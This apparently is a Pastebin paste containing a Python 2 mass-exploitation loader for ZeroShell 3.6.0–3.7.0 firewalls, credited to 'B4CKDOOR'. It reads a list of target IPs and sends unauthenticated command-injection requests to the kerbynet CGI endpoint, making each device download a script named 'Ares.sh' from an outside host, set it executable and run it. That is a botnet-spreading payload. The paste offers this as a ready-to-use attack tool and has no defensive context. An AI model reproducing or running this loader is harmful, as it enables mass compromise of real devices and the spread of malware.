Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- # -*- coding: utf-8 -*-
- # ZEROSHELL 3.6.0 - 3.7.0 EXPLOIT loader made by B4CKDOOR #
- # B4CKDOORARCHIVE.HOST - https://discord.gg/MVktpTW #
- import threading, random, socket, time, sys, requests, re, os
- from threading import Thread
- from time import sleep
- import requests
- from requests.auth import HTTPDigestAuth
- from decimal import *
- if len(sys.argv) < 3:
- print "\033[37mUsage: python "+sys.argv[0]+" <list> <port>\033[37m"
- sys.exit()
- ip = "1.3.3.7" # BINS LOCATION IP - PORTS 80 DEFAULT
- port = int(sys.argv[2]) # ports 80 8081 8083
- vulns = open(sys.argv[1], "r").readlines()
- class send_payload(threading.Thread):
- def __init__ (self, ip):
- threading.Thread.__init__(self)
- self.ip = str(ip).rstrip('\n')
- def run(self):
- try:
- url = "http://" + self.ip + "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;wget http://" + ip + "/Ares.sh; curl -O http://" + ip + "/Ares.sh; chmod +x Ares.sh; ./Ares.sh;%22"
- url2 = "http://" + self.ip + "/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=*%27;wget http://" + ip + "/Ares.sh; curl -O http://" + ip + "/Ares.sh; chmod +x Ares.sh; ./Ares.sh;%22"
- url3 = "http://" + self.ip + "/cgi-bin/kerbynet?Action=StartSessionSubmit&User=*%27;wget http://" + ip + "/Ares.sh; curl -O http://" + ip + "/Ares.sh; chmod +x Ares.sh; ./Ares.sh;%22"
- requests.get(url, timeout=3)
- requests.get(url2, timeout=3)
- requests.get(url3, timeout=3)
- print "[0xSHELL] Loading: %s"%(self.ip)
- except:
- pass
- for IP in vulns:
- try:
- ip = "".join(IP)
- ip = ip.replace("\n", "")
- t = send_payload(ip)
- t.start()
- time.sleep(0.03)
- except:
- pass #CODED BY B4CKDOOR
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement